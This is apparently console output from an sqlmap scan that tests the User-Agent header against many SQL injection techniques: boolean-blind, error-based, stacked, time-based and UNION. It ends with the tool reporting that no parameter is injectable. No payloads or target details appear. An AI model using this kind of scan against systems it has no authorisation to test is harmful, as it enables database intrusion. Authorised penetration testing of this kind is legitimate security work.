[07:21:33] [INFO] testing for SQL injection on User-Agent parameter 'User-Agent'
[07:21:33] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause'
[07:21:47] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause (MySQL comment)'
[07:22:02] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause (Generic comment)'
[07:22:19] [INFO] testing 'MySQL boolean-based blind - WHERE or HAVING clause (RLIKE)'
[07:22:32] [INFO] testing 'Generic boolean-based blind - Parameter replace (original value)'
[07:22:32] [INFO] testing 'MySQL boolean-based blind - Parameter replace (MAKE_SET - original value)'
[07:22:32] [INFO] testing 'MySQL boolean-based blind - Parameter replace (ELT original value)'
[07:22:32] [INFO] testing 'MySQL boolean-based blind - Parameter replace (bool*int - original value)'
[07:22:33] [INFO] testing 'MySQL >= 5.0 boolean-based blind - Parameter replace (original value)'
[07:22:33] [INFO] testing 'MySQL < 5.0 boolean-based blind - Parameter replace (original value)'
[07:22:33] [INFO] testing 'Microsoft SQL Server/Sybase boolean-based blind - Parameter replace (original value)'
[07:22:33] [INFO] testing 'Oracle boolean-based blind - Parameter replace (original value)'
[07:22:33] [INFO] testing 'Microsoft Access boolean-based blind - Parameter replace (original value)'
[07:22:33] [INFO] testing 'SAP MaxDB boolean-based blind - Parameter replace (original value)'
[07:22:33] [INFO] testing 'Generic boolean-based blind - GROUP BY and ORDER BY clauses'
[07:22:33] [INFO] testing 'Generic boolean-based blind - GROUP BY and ORDER BY clauses (original value)'
[07:22:34] [INFO] testing 'MySQL >= 5.0 boolean-based blind - GROUP BY and ORDER BY clauses'
[07:22:35] [INFO] testing 'MySQL < 5.0 boolean-based blind - GROUP BY and ORDER BY clauses'
[07:22:36] [INFO] testing 'Microsoft SQL Server/Sybase boolean-based blind - ORDER BY clause'
[07:22:36] [INFO] testing 'Oracle boolean-based blind - GROUP BY and ORDER BY clauses'
[07:22:37] [INFO] testing 'Microsoft Access boolean-based blind - GROUP BY and ORDER BY clauses'
[07:22:37] [INFO] testing 'MySQL stacked conditional-error blind queries'
[07:22:51] [INFO] testing 'Microsoft SQL Server/Sybase stacked conditional-error blind queries'
[07:23:03] [INFO] testing 'PostgreSQL stacked conditional-error blind queries'
[07:23:14] [INFO] testing 'MySQL >= 5.0 AND error-based - WHERE or HAVING clause'
[07:23:19] [INFO] testing 'MySQL >= 5.1 AND error-based - WHERE or HAVING clause (EXTRACTVALUE)'
[07:23:23] [INFO] testing 'MySQL >= 5.1 AND error-based - WHERE or HAVING clause (UPDATEXML)'
[07:23:28] [INFO] testing 'MySQL >= 4.1 AND error-based - WHERE or HAVING clause'
[07:23:32] [INFO] testing 'PostgreSQL AND error-based - WHERE or HAVING clause'
[07:23:38] [INFO] testing 'Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause'
[07:23:50] [INFO] testing 'Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause (IN)'
[07:23:53] [INFO] testing 'Oracle AND error-based - WHERE or HAVING clause (XMLType)'
[07:23:59] [INFO] testing 'Oracle AND error-based - WHERE or HAVING clause (utl_inaddr.get_host_address)'
[07:24:04] [INFO] testing 'Oracle AND error-based - WHERE or HAVING clause (ctxsys.drithsx.sn)'
[07:24:09] [INFO] testing 'Firebird AND error-based - WHERE or HAVING clause'
[07:24:11] [INFO] testing 'MySQL >= 5.0 error-based - Parameter replace'
[07:24:11] [INFO] testing 'MySQL >= 5.1 error-based - Parameter replace (EXTRACTVALUE)'
[07:24:12] [INFO] testing 'MySQL >= 5.1 error-based - Parameter replace (UPDATEXML)'
[07:24:12] [INFO] testing 'PostgreSQL error-based - Parameter replace'
[07:24:12] [INFO] testing 'Microsoft SQL Server/Sybase error-based - Parameter replace'
[07:24:12] [INFO] testing 'Microsoft SQL Server/Sybase error-based - Parameter replace (integer column)'
[07:24:13] [INFO] testing 'Oracle error-based - Parameter replace'
[07:24:13] [INFO] testing 'Firebird error-based - Parameter replace'
[07:24:13] [INFO] testing 'MySQL >= 5.0 error-based - GROUP BY and ORDER BY clauses'
[07:24:13] [INFO] testing 'MySQL >= 5.1 error-based - GROUP BY and ORDER BY clauses (EXTRACTVALUE)'
[07:24:13] [INFO] testing 'MySQL >= 5.1 error-based - GROUP BY and ORDER BY clauses (UPDATEXML)'
[07:24:14] [INFO] testing 'PostgreSQL error-based - GROUP BY and ORDER BY clauses'
[07:24:14] [INFO] testing 'Microsoft SQL Server/Sybase error-based - ORDER BY clause'
[07:24:14] [INFO] testing 'Oracle error-based - GROUP BY and ORDER BY clauses'
[07:24:14] [INFO] testing 'MySQL > 5.0.11 stacked queries'
[07:24:16] [INFO] testing 'PostgreSQL > 8.1 stacked queries'
[07:24:24] [INFO] testing 'PostgreSQL < 8.2 stacked queries (Glibc)'
[07:24:27] [INFO] testing 'Microsoft SQL Server/Sybase stacked queries'
[07:24:32] [INFO] testing 'Oracle stacked queries (DBMS_PIPE.RECEIVE_MESSAGE)'
[07:24:36] [INFO] testing 'Oracle stacked queries (DBMS_LOCK.SLEEP)'
[07:24:40] [INFO] testing 'Oracle stacked queries (USER_LOCK.SLEEP)'
[07:24:45] [INFO] testing 'MySQL > 5.0.11 AND time-based blind'
[07:24:50] [INFO] testing 'MySQL > 5.0.11 AND time-based blind (comment)'
[07:24:55] [INFO] testing 'PostgreSQL > 8.1 AND time-based blind'
[07:25:01] [INFO] testing 'PostgreSQL > 8.1 AND time-based blind (comment)'
[07:25:07] [INFO] testing 'Microsoft SQL Server/Sybase time-based blind'
[07:25:11] [INFO] testing 'Oracle AND time-based blind'
[07:25:15] [INFO] testing 'Oracle AND time-based blind (comment)'
[07:25:19] [INFO] testing 'MySQL UNION query (NULL) - 1 to 10 columns'
[07:25:47] [INFO] testing 'MySQL UNION query (random number) - 1 to 10 columns'
[07:26:43] [INFO] testing 'MySQL UNION query (NULL) - 11 to 20 columns'
[07:27:23] [INFO] testing 'MySQL UNION query (random number) - 11 to 20 columns'
[07:28:20] [INFO] testing 'MySQL UNION query (NULL) - 21 to 30 columns'
[07:29:08] [INFO] testing 'MySQL UNION query (random number) - 21 to 30 columns'
[07:30:04] [INFO] testing 'MySQL UNION query (NULL) - 31 to 40 columns'
[07:31:00] [INFO] testing 'MySQL UNION query (random number) - 31 to 40 columns'
[07:31:52] [INFO] testing 'MySQL UNION query (NULL) - 41 to 50 columns'
[07:33:04] [INFO] testing 'MySQL UNION query (random number) - 41 to 50 columns'
[07:34:13] [INFO] testing 'Generic UNION query (NULL) - 1 to 10 columns'
[07:35:21] [INFO] testing 'Generic UNION query (random number) - 1 to 10 columns'
[07:36:19] [INFO] testing 'Generic UNION query (NULL) - 11 to 20 columns'
[07:37:25] [INFO] testing 'Generic UNION query (random number) - 11 to 20 columns'
[07:38:30] [INFO] testing 'Generic UNION query (NULL) - 21 to 30 columns'
[07:39:33] [INFO] testing 'Generic UNION query (random number) - 21 to 30 columns'
[07:40:25] [INFO] testing 'Generic UNION query (NULL) - 31 to 40 columns'
[07:41:24] [INFO] testing 'Generic UNION query (random number) - 31 to 40 columns'
[07:42:32] [INFO] testing 'Generic UNION query (NULL) - 41 to 50 columns'
[07:43:42] [INFO] testing 'Generic UNION query (random number) - 41 to 50 columns'
[07:44:37] [WARNING] User-Agent parameter 'User-Agent' is not injectable
[07:44:37] [CRITICAL] all parameters appear to be not injectable. Try to increase --level/--risk values to perform more tests. Also, you can try to rerun by providing either a valid --string or a valid --regexp, refer to the user's manual for details

[*] shutting down at 07:44:37

root@bt:/pentest/database/sqlmap#
